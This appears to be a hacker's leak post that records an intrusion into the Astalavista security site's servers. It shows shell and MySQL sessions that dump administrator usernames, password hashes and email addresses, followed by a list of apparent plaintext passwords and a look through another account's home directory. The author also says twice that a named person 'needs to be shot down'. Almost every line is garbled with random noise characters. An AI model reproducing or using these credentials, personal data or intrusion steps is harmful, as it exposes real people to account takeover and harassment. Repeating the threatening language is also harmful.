<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
" D( y5 U5 m& Q" E! u* C. s <docs>http://blogs.law.harvard.edu/tech/rss</docs>$ S& E1 C. L8 t$ _& N! J2 {
<generator>Astalavista.com</generator>5 Q& Q6 S/ v4 `. I5 J
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
5 G# t0 Z* O% G/ f; \3 g# ` </channel>$ `; H: [- y$ n! }! J
</rss>’;
^) A0 x+ Y; N% j8 D* U2 Q" G3 B# }5 F0 Z3 V9 a
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
3 n! y# e3 T% \, F1 U$ y! q; _3 P unlink (FULLPATH . ‘/feed/exploits.xml’);
2 b. |9 f' C: W" Z s5 T }
1 o$ M& m b$ Z! O7 Y5 p% L- G. o! n7 E: G& |
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
, \$ n/ B8 y% N" j[snip]# p; b3 h8 V0 }& h$ B4 o O
' V- l' A a, v- F, ~" r8 Z
sh-3.2$ cat exploits.sh
4 ^ I8 Z) I, z. Z3 ^#!/bin/sh* U7 f/ v8 T1 U2 P4 ]
; ]: Y$ c) b& `4 o###########################################################
2 q H( x3 s+ Q/ y( ?7 | s& @# #
0 T2 J: ?3 ]' }' m# Title: milw0rm exploits adder #+ _( q8 s1 v% r7 k* {3 A) I" k+ P
# Description: Add all milw0rm exploits to the #
6 c6 c; I. B7 }4 i6 t; N# Astalavista.com database #
% R) T# ^! Y4 O# # O: r/ ~8 Y" {7 |5 E9 E
# Company: Astalavista Group #
: g/ z7 w. ?: ?' B# Author: Paulo M. Santos #
+ y) ^4 `. p$ s" d5 s! I* }2 X; a% s# E-Mail: 链接标记paulo.santos@astalavista.ch #$ ^# \7 _5 Y6 I% O, u. h
# #
6 u/ o3 \9 ~' C' c& ]###########################################################( v2 U/ |; b7 I$ u5 k% l' r
2 G) f7 ?+ A8 k, ~# path
8 n- b1 [2 o" S+ K; ^3 F! X( Rthis_path=/home/com/public_html/modifications/cronjobs7 a0 @. T, E; C& |: @3 i8 I
, X5 t0 \. k) S0 d
# change directory3 _3 z6 f& {2 Z$ Y% n2 Z; \8 t' Q
cd $this_path
; G9 Z2 X; N$ P3 L9 a& ncd tmp/
3 y! _7 z3 z/ R8 Z; ?% ^3 c# ]: x- f) K2 S
# delete files* h; a( r% `/ h5 \5 ?! _- Z
rm -rf milw0rm.tar.* &
( L0 }' F! d( w" Q- u1 nrm -rf milw0rm/ &7 O+ T; l) |" [6 k: g0 s v" H
4 u$ @: \; `5 g. ?3 m# wget milw0rm paket
1 k1 w7 G7 k, vwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
. D) p3 f8 |/ i6 V) @$ @
, ~* h* X2 W! O$ ~6 U# _3 l# extract milw0rm paket$ [ C% m c8 T+ l+ k
tar -xvf milw0rm.tar.bz2; a/ L% [6 y: _/ k8 ~
1 c+ R/ u4 l2 S: z# I, {! G# change owner
& G! k0 z1 I3 K9 J/ M- ?chown -R com .
9 V6 \' h0 d; Uchgrp -R com .
3 r1 j+ N3 u. @; p, ]1 q; Q
) H/ W/ e! C1 o4 x9 Z3 c; z" {$ o# execute php script
& U7 L$ S7 q/ j# ]cd $this_path0 g8 v+ m+ b0 i+ I
php -q exploits.php( K1 b- G; N5 H) B: {* m
1 [& B, e# \( p9 Y6 X! n
# delete files
: O; f# ^0 i9 k' _rm -rf tmp/milw0rm.tar.*! D7 P5 c' @2 u" @ i
rm -rf tmp/milw0rm/3 V7 M) A& t% g% z' o
3 R7 o8 |+ b I. Ash-3.2$ echo “Paulo M. Santos needs to be shot down.”' r! c: f6 e! k! y* |: x
Paulo M. Santos needs to be shot down.
# `& j2 {* ]6 A8 c/ G6 U" K [$ s! R1 a$ r* |
mysql -u contrexxuser2 -p
0 f, _# s. \/ L) Y5 |0 VEnter password:
( v! D$ Z8 ^ I; R3 [# N* SWelcome to the MySQL monitor. Commands end with ; or \g.0 [- u0 J; }( |9 o( |1 ^, \
Your MySQL connection id is 261694
6 U" P9 ]! l4 @' | [; N P+ C& eServer version: 5.0.45-community-log MySQL Community Edition (GPL)
+ I' ^; A1 h6 J( D6 w$ F/ E% X
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
" U5 Y/ N9 A- n
' X: m, @* }. k! W2 O. [8 Qmysql> show databases;& @+ ]( x' S" A2 {: s& B% `
+——————–+9 G' \1 q1 b6 p; I6 M
| Database |
; y& T; |* y" _- D+ E" x0 [) a+——————–+
# _/ \ h- I" D+ u& {| information_schema |( B$ ~& {% I* R. U: D
| com_contrexx2 |+ T' [. c9 [# P Q. s
| com_contrexx2_live |
4 J& z# Q! e' B. A F1 s# [( q" s| test |9 T; B0 m7 O4 y/ i/ p8 Y
+——————–+
T/ ~# t4 D; e, N- E( [# R' ]4 rows in set (0.00 sec)' X2 q$ f) y8 S( }6 y
5 N: d5 c$ m& O& M# g
mysql> use com_contrexx2_live3 o* Y1 n. K6 N: t4 ~/ M+ a
Database changed# `- b- _: l' l7 d" y/ i4 o3 G/ T, `7 u
mysql> show tables;
. B7 w4 v8 b4 b/ d; p( [) r+————————————————–+/ g) p$ R: R1 x) C4 @" a
| Tables_in_com_contrexx2_live |
9 l& l+ u) c! A1 w* C) Y4 h9 m, X! F+————————————————–+
; a5 U* i! G- E8 l8 u| cc_banner_counter |
1 `; @7 F4 J1 Z; n| cc_search_counter |
" o+ f$ X/ A) f+ a8 J| contrexx_access_group_dynamic_ids |0 j7 O6 F& |/ }# w+ p
| contrexx_access_group_static_ids |
* G/ P3 {7 e/ M6 R; J8 || contrexx_access_rel_user_group |
) S6 n/ C( c9 }& ]| contrexx_access_settings |
5 B, S1 s7 g2 {- f* L" N2 Y: X| contrexx_access_user_attribute |: ]# U5 A$ z+ T# E: x
| contrexx_access_user_attribute_name |* z- w& I' ]- `$ _3 {- D
| contrexx_access_user_attribute_value |
& r4 d8 k3 b3 J5 |9 C, Q! R| contrexx_access_user_core_attribute |
6 B/ }( `/ ?3 z! U" F+ o& Q| contrexx_access_user_groups |
5 E; O, p) _, M P# t0 r( B& Z" @| contrexx_access_user_mail |
0 S& M c6 N+ e| contrexx_access_user_profile |
4 v ?; _8 Z4 R9 s5 `/ @+ Y| contrexx_access_user_title |' H! D0 a3 C" m8 z! ~
| contrexx_access_user_validity |% C/ k* [' `7 O! j- M" s# v, Z& L
| contrexx_access_users |
4 ~- N) L. n8 L6 Z* y: l9 v| contrexx_backend_areas |
0 [# u+ m0 ^1 h# _+ h| contrexx_backups |9 J0 n6 _" T g
| contrexx_content |
5 w3 f' q/ P4 I/ Q, l( p| contrexx_content_history |5 h) h" S) r& s0 N
| contrexx_content_logfile |
! f0 z4 L# N+ ?- s/ e. B$ j| contrexx_content_navigation |* _# ~4 ^5 I$ D2 @" ~0 X, A
| contrexx_content_navigation_history |/ V$ u9 E7 [7 ]- U
| contrexx_ids |: |4 r* U( ]6 x7 J! Q4 P
| contrexx_languages |' N9 g$ w j. v C0 P
| contrexx_lib_country |2 i% I- \+ A9 A( Z0 x9 C6 T
| contrexx_log |
; b3 D% n$ L3 h| contrexx_module_alias_source |. v% {+ I* q+ ^
| contrexx_module_alias_target |
; D5 w) S; b0 z3 B. h- F| contrexx_module_block_blocks |
; H0 n. u; p2 K q| contrexx_module_block_rel_lang |/ s3 F& x; K; p, @5 [1 A
| contrexx_module_block_rel_pages |6 G8 y8 F/ ~0 g9 Q2 @! G
| contrexx_module_block_settings |$ f% V: F, J2 ]* s. g# A
| contrexx_module_blog_categories |6 [% U! O6 T4 ?; k" }
| contrexx_module_blog_comments |2 s5 X. B; A5 T
| contrexx_module_blog_message_to_category |+ s$ j: [& v+ N A# ~1 _; p
| contrexx_module_blog_messages |
/ N9 }/ g, A6 i9 ?| contrexx_module_blog_messages_lang |% | V6 h5 q: U) b @
| contrexx_module_blog_networks |' ~) v& q- F2 `
| contrexx_module_blog_networks_lang |1 z* X3 G7 B; W
| contrexx_module_blog_settings |# p# D5 O& r& U4 D
| contrexx_module_blog_votes |! c# v0 o# F: @# I" K
| contrexx_module_calendar |6 x. s% e0 _8 n4 h$ Q
| contrexx_module_calendar_access |, |5 N1 L3 [7 ^
| contrexx_module_calendar_categories |
- ?1 c8 Y! e/ d7 i4 W1 W( x5 Q| contrexx_module_calendar_form_data |) F, ?! ^8 o- o0 s9 t+ E2 h
| contrexx_module_calendar_form_fields |' n0 s7 @$ f- u: |
| contrexx_module_calendar_registrations |- T$ Z: v' w) t" L" |
| contrexx_module_calendar_settings |9 K2 t( Y2 \/ W4 W2 e
| contrexx_module_calendar_style |2 @/ b2 y! L a" R
| contrexx_module_contact_form |3 P4 u' h- U9 F) V
| contrexx_module_contact_form_data |
1 _1 A6 g& L# E0 t# t) u n5 E| contrexx_module_contact_form_field |0 y1 a' c1 O* l4 x6 m/ @
| contrexx_module_contact_settings |
0 q) L7 h. h: e+ V1 H| contrexx_module_data_categories |
/ Y0 z* {; j4 A) U8 e4 s6 P; g; @| contrexx_module_data_message_to_category |
" }6 d9 ~% u1 @( j @| contrexx_module_data_messages |2 ~. {, f; D1 w/ g) ^
| contrexx_module_data_messages_lang |
5 e5 f# o5 a3 q9 C- ? H% U| contrexx_module_data_placeholders | b. w* j' v* u# Q k: H0 s+ P
| contrexx_module_data_settings |; r, i, _# C3 g0 r
| contrexx_module_directory_access |. R% U9 h5 i* e5 w$ ~' V0 _6 d
| contrexx_module_directory_categories |
7 c3 l$ f+ S P& I& C7 ]| contrexx_module_directory_dir |/ ?1 q& n. R: A9 h- M
| contrexx_module_directory_inputfields |
. W& N p J' q& u4 B| contrexx_module_directory_levels |+ O' V; O; i( B) D
| contrexx_module_directory_mail |# j$ {- g& n" U6 o/ k
| contrexx_module_directory_rel_dir_cat |+ V$ r; x% v6 |" `" g- T0 Z
| contrexx_module_directory_rel_dir_level |4 q+ `: z3 P/ u, M
| contrexx_module_directory_settings |4 n+ ]3 i }1 g' w1 a, R7 D3 Z
| contrexx_module_directory_settings_google |
6 z ]: m, D) z8 A2 D' [| contrexx_module_directory_vote |4 O- [& r' i u
| contrexx_module_docsys |0 d% b8 |+ T/ z1 o& C2 C
| contrexx_module_docsys_categories |" a- R, p1 D0 L# i! [1 ~0 \; F
| contrexx_module_egov_configuration |
% a- l1 E. Q- f| contrexx_module_egov_orders |0 Z( \" w9 w+ e2 b; Z
| contrexx_module_egov_product_calendar |
7 i- n8 M' r1 t| contrexx_module_egov_product_fields |3 }# U9 \4 ?" Q( ^3 v+ z
| contrexx_module_egov_products |2 f- Z+ D) o" A% g/ O
| contrexx_module_egov_settings |
! P( I2 D# N$ I* h; _| contrexx_module_exploits |
: Y/ F6 o4 R' H' k| contrexx_module_exploits_categories |
5 p: I! d. k# e( i| contrexx_module_feed_category |
" c5 h( p7 A6 Q6 m| contrexx_module_feed_news |
% e, [" r3 d" C' V5 n2 a| contrexx_module_feed_newsml_association |8 \, ~5 P; X' l- Y9 X! @0 H
| contrexx_module_feed_newsml_categories |' }, C, G4 s& w( p- a1 ?: x/ r
| contrexx_module_feed_newsml_documents |5 L7 @2 t% `/ e& p I1 `
| contrexx_module_feed_newsml_providers |8 k) f7 R. E v9 }& _0 u5 O
| contrexx_module_forum_access |
& f+ ] {0 [( z: m' `/ w4 g| contrexx_module_forum_categories |5 M" x: a& N {; N G+ ?
| contrexx_module_forum_categories_lang |
/ |5 Z0 R2 T" R+ z| contrexx_module_forum_notification |
; \ l4 n% S: i| contrexx_module_forum_postings |5 }3 A" b, b- j1 g- g! V
| contrexx_module_forum_rating |
( `! K6 q7 ~# s- u+ }8 ?| contrexx_module_forum_settings |" y$ e. l# _. `4 r" M, h5 K
| contrexx_module_forum_statistics |
4 [- p* T; k2 @2 r# X9 E: s1 ~| contrexx_module_gallery_categories |- J4 L$ \ T$ A, p
| contrexx_module_gallery_comments |
. u, N* m' Q! x| contrexx_module_gallery_language |, j# s! a, V& Q7 L- q" N7 Q
| contrexx_module_gallery_language_pics |- ]& B$ ^% b& c0 z0 |
| contrexx_module_gallery_pictures |
: V' j" K3 h$ W( X! ]& i2 R| contrexx_module_gallery_settings |! }) e7 K9 a# _
| contrexx_module_gallery_votes |" R/ {' g1 P, `; ^# N; _+ V5 c
| contrexx_module_guestbook |2 b: g; l- U4 a$ P/ j
| contrexx_module_guestbook_settings |
; ?4 D; I& E6 ?% t1 Q( @| contrexx_module_livecam |5 R, H( x$ B7 p* c9 G- F/ H) w
| contrexx_module_livecam_settings |. n- N2 Q7 |+ z0 h& s V5 T
| contrexx_module_market |
; t1 ?* J; i/ M) a| contrexx_module_market_access |
) ], ]; r d; N5 z6 s: O6 z; x| contrexx_module_market_categories |( m; ~7 H F! o3 T
| contrexx_module_market_mail |
% ? Z Q4 W7 b2 ?% n| contrexx_module_market_paypal |
: q1 v3 v& h# g. R: l- l! A8 b| contrexx_module_market_settings |
$ _" X2 Z: } I& I. q6 z N# B| contrexx_module_market_spez_fields |
1 d" R/ H3 u8 v ] Z F/ p| contrexx_module_mediadir_access |8 x) P6 w: W$ G5 G/ Q$ W+ X
| contrexx_module_mediadir_categories |
0 B( p6 r/ E3 s6 o) ~( Y2 ]| contrexx_module_mediadir_comments |
( e j& e) X& E/ Y| contrexx_module_mediadir_dir |. L* H0 j' o d+ R5 C4 _
| contrexx_module_mediadir_inputfields |
( K' d2 r5 q% H! G* j ~4 g+ ]9 Q| contrexx_module_mediadir_levels |
# Y$ D! W- _0 y6 ]| contrexx_module_mediadir_mail |) D; o, p0 W' }% j9 d
| contrexx_module_mediadir_rel_dir_cat |
5 O" W( W2 U$ H7 E| contrexx_module_mediadir_rel_dir_level |
- \0 f, n' i( v$ l4 z' Z5 Z| contrexx_module_mediadir_reports |
: n8 e9 f. R3 a8 }. t7 X K| contrexx_module_mediadir_settings |: h. N3 u0 ^! A" H& L9 [
| contrexx_module_mediadir_settings_google |
8 A: ~; q( C. y, ]| contrexx_module_mediadir_vote |
! @* H8 @2 y" ]7 E" Q1 M| contrexx_module_memberdir_directories |. }8 b2 U( a& D& \2 t
| contrexx_module_memberdir_name |
+ H1 J, G8 C, l! N| contrexx_module_memberdir_settings |
6 q" u) c( _, H4 r| contrexx_module_memberdir_values |* d- ^9 W) C; {1 |" U, k
| contrexx_module_nettools_allowed_groups |
0 T1 D' F9 K4 S* N0 ~& u| contrexx_module_nettools_settings |# E! }1 B! W6 p, b, X
| contrexx_module_news |) R' @5 s' q" M! A7 g( W
| contrexx_module_news_access |
& N, {: ?- M; ]: u& D| contrexx_module_news_categories |
7 D; l7 p) O+ R" i| contrexx_module_news_settings |& ~& @0 X% M6 l5 b$ _3 i- N
| contrexx_module_news_teaser_frame |
7 q1 m0 y8 J% x( J| contrexx_module_news_teaser_frame_templates |
1 h6 J- h- B* p, T8 \" a| contrexx_module_news_ticker |) E$ H/ Q6 q; K2 P1 T& E% _4 Y4 M
| contrexx_module_newsletter |- {( T% ^1 C {: ]6 p
| contrexx_module_newsletter_attachment |1 F% ]( J6 t r3 H
| contrexx_module_newsletter_category |$ ]* B+ S) R; ^, O p3 X7 N
| contrexx_module_newsletter_confirm_mail |
& }* a+ x5 ~; a2 d( T9 t| contrexx_module_newsletter_rel_cat_news |2 Y8 I y4 Y$ L! K. _
| contrexx_module_newsletter_rel_user_cat |6 y; e0 c5 d$ z5 W# u/ l
| contrexx_module_newsletter_settings |) h( P: \3 j) ^
| contrexx_module_newsletter_template |+ E0 I/ S3 C! I9 K2 Z
| contrexx_module_newsletter_tmp_sending |
% u) I! s4 p& a0 c9 w" h1 H" U7 j; _- {. C| contrexx_module_newsletter_user |
8 w5 g& L5 }4 P! q| contrexx_module_newsletter_user_title |
+ A3 O8 K V l- _ {$ ?; e; x| contrexx_module_onlinetools_defaultports |, r1 u& w- }, t2 \
| contrexx_module_onlinetools_defaultports_back |
5 }8 `7 b1 ^! J& R6 x6 j& {| contrexx_module_onlinetools_geolitecity_blocks |2 o& o7 o' X# }
| contrexx_module_onlinetools_geolitecity_country |8 @* A* U/ V& I( X
| contrexx_module_onlinetools_geolitecity_location |" O2 l- Q6 x, C$ `6 a
| contrexx_module_podcast_category |
# I9 D$ n4 o2 [( y# ]2 g, V| contrexx_module_podcast_medium |2 ~6 ?, e/ |) F ~6 O$ |0 l3 ?% s! `- M
| contrexx_module_podcast_rel_category_lang |
9 ~: H' R5 D _7 \| contrexx_module_podcast_rel_medium_category |6 w7 k3 _ v0 K5 H5 D8 |
| contrexx_module_podcast_settings |
! p. Z7 V; U, e$ [7 L5 Z| contrexx_module_podcast_template |9 U) j4 a" R* Q z$ D
| contrexx_module_proxydb |
: M2 F7 L7 F- h. B4 U| contrexx_module_recommend |6 }+ }) |- n' J) _/ _
| contrexx_module_repository |
2 r& O) j1 B: ], I| contrexx_module_securitynews_cats |
4 ?& z) {% N. M& `; || contrexx_module_securitynews_feeds |
0 A( Q+ v5 ?# {| contrexx_module_securitynews_news |8 v% F8 {( Z, D, R* F" H
| contrexx_module_shop_categories |
' U& i0 @8 T. ~3 ~0 n) n| contrexx_module_shop_config |8 s/ O0 ~9 l- F8 b
| contrexx_module_shop_countries |7 T) I+ ?: Z* Q3 \6 @ c8 F5 y! o
| contrexx_module_shop_currencies |
' {" u' @6 D% W2 K! I" L| contrexx_module_shop_customers |
: [7 M* G4 |' r- H' u| contrexx_module_shop_importimg |: ^$ Z* _8 l# p# e- e
| contrexx_module_shop_lsv |
. l' c! ~4 P* y| contrexx_module_shop_mail |) v5 x* Y: c9 s
| contrexx_module_shop_mail_content |
+ u& ^1 A. a. L7 {6 {| contrexx_module_shop_manufacturer |3 b+ b. X' t* e( ]( Z) r- S+ y
| contrexx_module_shop_order_items |+ C1 }$ ^5 M0 N6 ^
| contrexx_module_shop_order_items_attributes |+ L) [! [! d8 ]0 |. A
| contrexx_module_shop_orders |
4 a+ c7 u5 ?& Q| contrexx_module_shop_payment |
W t6 P& I; @0 J| contrexx_module_shop_payment_processors |
5 } B6 q( [" O$ z' N| contrexx_module_shop_pricelists |
5 H/ Y3 R+ y3 W* X9 k* f) Q| contrexx_module_shop_products |. @ `; i" \4 O$ A B
| contrexx_module_shop_products_attributes |- J$ i4 s& [; S, e
| contrexx_module_shop_products_attributes_name |! n# x n8 `) A5 ?8 s
| contrexx_module_shop_products_attributes_value |! V4 q. o5 `' I( v) g% Z
| contrexx_module_shop_products_downloads |
; b/ `; y0 { m! U; G7 _, t* d| contrexx_module_shop_rel_countries |
I% j6 @+ S5 t| contrexx_module_shop_rel_payment |
( K1 ^( R7 D( `; W# T| contrexx_module_shop_rel_shipment |
7 i9 h$ n0 T$ h6 _9 [| contrexx_module_shop_shipment_cost |' ?. c: r% v: |3 f6 @% L5 T
| contrexx_module_shop_shipper |
. A6 c. _6 y7 ~. r| contrexx_module_shop_vat |. {8 E' q8 s6 L: i- g- q
| contrexx_module_shop_zones |; f& {( K. u8 K+ I+ Q, e
| contrexx_module_u2u_address_list | l, l! q4 Z# ]* O7 c' t1 H3 a# f
| contrexx_module_u2u_message_log |/ Y* k ]4 b8 h" A% R# L- F' d
| contrexx_module_u2u_sent_messages |
R% x5 `5 J( A1 u| contrexx_module_u2u_settings |
; B7 L6 e3 e* t1 S K1 d| contrexx_module_u2u_user_log |
- Q) h& C7 b& H3 E9 `9 Y% J| contrexx_modules |
5 l+ x# U R8 M4 M! w, h, r| contrexx_sessions |
8 W7 j; y- X3 V& y| contrexx_settings |
7 f, C" k5 O" R L" i O! e* _| contrexx_settings_smtp |
) X/ u0 q2 C+ m1 \4 T+ b| contrexx_skins |
; b: A" b# \( w| contrexx_stats_browser |
L( O1 m/ V3 F( ?9 p| contrexx_stats_colourdepth |
: o0 k, H& }. q' g' y8 x$ H! x| contrexx_stats_config |
0 J& R a5 o5 P| contrexx_stats_country |
0 s5 Y2 g+ f! ]| contrexx_stats_hostname |
* T3 ]# F) m' T; `$ L. H# p| contrexx_stats_javascript |
Q2 q- k- D! j| contrexx_stats_operatingsystem |( ^3 }$ _: ]' t1 o8 n- u0 s
| contrexx_stats_referer |
4 F3 v, i; i" Z8 o$ L| contrexx_stats_requests |
) C; S$ T2 |. O. ~+ D9 m| contrexx_stats_requests_summary |
4 m7 p C4 M1 Y$ ]4 N9 X| contrexx_stats_screenresolution |
0 i* a) Z: H( \| contrexx_stats_search |
' i! }: i7 W/ O# S: ~| contrexx_stats_spiders |
6 J, x- m; h( g* X' t. d% f4 t1 I| contrexx_stats_spiders_summary |
& P* a% Z+ R+ P- x S' M& o$ W: i| contrexx_stats_visitors |( x g& N9 O1 D8 F) m# s4 D
| contrexx_stats_visitors_summary |
' q+ P- D4 ?6 p| contrexx_voting_additionaldata |$ t" p6 C; E/ g' n* m2 z; {
| contrexx_voting_email |
& O I8 p9 Z4 F2 w( w A| contrexx_voting_rel_email_system |' S/ M! b6 r" ^$ \- r+ _
| contrexx_voting_results |4 ]" S. N! A0 R
| contrexx_voting_system |
# x* q6 d( d U. A4 q9 K| foo |
- [$ J- \# C7 p" r5 z+————————————————–+1 }: y7 r; g. F* ]2 U, ^1 y
227 rows in set (0.01 sec)
3 L: A; r: I, L3 U" H8 k/ e/ ?! u
0 }0 o& k# G4 ^( h. N3 F" ^mysql> select count(*) as skids from contrexx_access_users;# T }/ Y I9 p1 ?! ]& _% D+ A1 T
+——-+" e2 H& d h% [5 H4 b' ]- x
| skids |3 ?) Z2 g; a- L4 e: s W2 u- L4 f. H
+——-+. d+ A0 B+ d, a7 I* N" z- @, R
| 53699 |
. g$ } Z: n5 Z9 e+——-+5 x7 V3 D) u6 m
1 row in set (0.00 sec): J9 _% g, \' c* {! o; s
; C: P/ C3 Y) v# x" Gmysql> describe contrexx_access_users;& J4 o6 a4 X# B0 @" p( f8 s
+——————+——————————————+——+—–+————–+—————-+" j' I( @0 M6 O, u/ I, k: ?
| Field | Type | Null | Key | Default | Extra |
; V1 _5 Q2 d; j( x7 z+——————+——————————————+——+—–+————–+—————-+
, D7 i2 o& t$ Z" j/ C+ u| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
1 x0 m- l- k m4 N7 R0 f| is_admin | tinyint(1) unsigned | NO | | 0 | |
9 a( N* C" E) v) _" F! i| username | varchar(40) | YES | MUL | NULL | |- L$ }# X: K( p! S. f
| password | varchar(32) | YES | | NULL | |; [4 z n5 J: `7 `* R
| regdate | int(14) unsigned | NO | | 0 | |
- N& a0 V0 m# t: u6 Y. ~( ~| expiration | int(14) unsigned | NO | | 0 | |
E, Y' _# u' l5 \| validity | int(10) unsigned | NO | | 0 | |& D3 R$ Q4 L: ~5 V3 W4 K
| last_auth | int(14) unsigned | NO | | 0 | |
- o5 h0 J$ |+ ^| last_activity | int(14) unsigned | NO | | 0 | |
/ d, `8 D# s: C& x0 w( f" E| email | varchar(255) | YES | | NULL | |
$ B( t/ b9 _( x% }) m5 J* I| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |$ E! S P9 c# N" S
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
! p: f( m) A$ L! l! ?; I| backend_lang_id | int(2) unsigned | NO | | 0 | |
6 R! Z5 l; l6 ~! t+ @. S| active | tinyint(1) | NO | | 0 | |! H; |2 W4 s7 w
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |4 o2 \& z. B/ m0 u ?, D
| restore_key | varchar(32) | NO | | | |
/ ^3 j2 P; e L$ G: f| restore_key_time | int(14) unsigned | NO | | 0 | |
O+ ]4 x3 o: f* \- t| u2u_active | enum(’0′,’1′) | NO | | 1 | |2 o {) p, i/ Q( [, t6 r
+——————+——————————————+——+—–+————–+—————-+# i; F) n7 e4 V( L9 k
18 rows in set (0.00 sec)
+ l- q. Q+ g& J+ M6 P% F4 U* n$ t/ S u( F4 R
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
0 x: _4 ]7 d4 q. t8 D. y, G, e. _+————+———————————-+—————————–+
5 ^0 j# [' p3 C/ z9 w| username | password | email |
: a5 M$ e, q+ k: _2 E+————+———————————-+—————————–+0 J; H, ]* f! `4 [5 p" T/ p
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |% [% h; J" F% O: l
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |% I+ M' _0 }4 S% `! {
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |8 z7 Y" w9 _1 t: S; A- P7 r
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
7 a, @0 h( j$ D7 k2 _. W+————+———————————-+—————————–+9 e6 \4 j1 i. O6 U- ^0 [
4 rows in set (0.04 sec)# i2 T; e! q) Z9 N# \
$ k: `/ B1 b. fmysql> exit;
; {+ y# k+ e7 Q+ }) k0 Y. [8 TBye3 m5 y7 N" K! a( L+ Q' w
! _7 b8 W1 t$ N' u. G( b[~] There you go, your “team of security and IT professionals” is a joke.1 a% u& i4 G! @' e- Y2 W
. b7 Y: }6 R( [5 {! e+——————————+
. l! {8 _" v, M7 ksystem:f82BN3+_*: o. m: Y1 U+ a
Be1er0ph0r:belerophor4astacom
5 r! Q' F Z, y, Y) I% }prozac:asta4cms!: Z. }, m4 O- A4 @ N9 h& H
commander:mpbdaagf6m
" |& v; a' Y- ^# G7 ~9 T: Gsykadul:ak29eral1 B# X9 u3 D9 g( t4 T _
+——————————+/ R- a3 l% r4 V- F5 }# z
1 l% z6 s2 ]. r6 U[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
7 T2 B$ I7 Z; [6 T4 n6 P…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
7 R4 b6 ]' w$ k9 C0 o$ M2 @( }6 l% {. r g6 J
[~] Lets move to astalavista.net now,
, E6 B. m2 Y6 D1 @- Q$ }: B( P' J
From <链接标记[url]https://www.astalavista.net/[/url]>:% h) Y5 h" \, D( X9 X+ |$ M6 r; s
>> Everyone knows that the best defense is a good offense.
4 B2 M- ~# M- j>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
& I, R, s$ T s5 `/ z& ?>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
Q3 }# C! H0 |4 ^! T: `3 I>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
/ I+ t5 M: n- L0 q" A% F
0 E2 X6 I, C2 g! o3 A& `& i>> Go ahead, try and hack our server . in a completely legal way!0 T, @$ Z, x+ o4 Z# b- `1 [
>> Learn by doing: We offer our members tricky tasks and challenges on an9 k0 i1 b: p2 T! d+ ^
>> ongoing basis so you can test your knowledge and abilities. You can also
& A- z# \2 [* o0 t' H; x>> demonstrate what you.ve mastered by taking part in regular hacker contests
( H1 D3 ^! i, b5 d4 _6 f8 K>> and war games
. _3 r7 k3 o ?0 K% ?& u5 t# p$ M: Q+ o, \& V
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!" n/ w( T5 V! _7 [
* X4 |5 d) {6 X$ d! i* l
[-] Tricky task: Find home dir of astalavista.net
?- y2 t0 f6 _/ X. z# T$ v
, S4 o' V4 b/ }+ |sh-3.2$ ls -la ~astanet1 m9 [/ o; G7 M$ u* t
total 48
" g+ i* S" L2 k) v; v4 Gdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .' n: d2 ?/ g5 p! ~" u* p6 |
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 J6 v2 U4 e V d# H8 { Hdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
9 p3 p" `8 s: W7 I. c' }-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history! P4 _8 _! A5 m: {
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
( A& h& v/ [& L0 D# l-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile+ a( E5 h6 c2 ]$ a8 t7 G
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc. y8 V, z3 l! d9 d v: {( _
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
) w/ G1 z, t, E2 ?drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap: R# d8 ?9 B/ R' V
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail# o0 r. I: v k! d& U
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html7 I: E6 x0 y2 `9 _" t: D7 O7 P
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
- n+ W/ Z" c8 j) l+ h: c
7 c) m, m2 T( Lsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/. E+ S; h. D. L$ X: f: e
sh-3.2$ ls -la" h% m! u& D0 O/ M' E
total 200
8 _* }* D8 n7 P* K6 |drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
% a4 c6 s5 w( E3 ddrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
; ~7 R. q8 m; ldrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
% ]( N7 ]7 K; U* D* g; ]: ]4 w2 t$ Wdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql/ k# c/ ]5 N/ S% r$ f
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com1 ]2 M8 w9 U: k) p. a% W
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend0 Y9 w# y# `- {8 _; e' I0 e
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner9 n* \' N: a5 b- O* Q
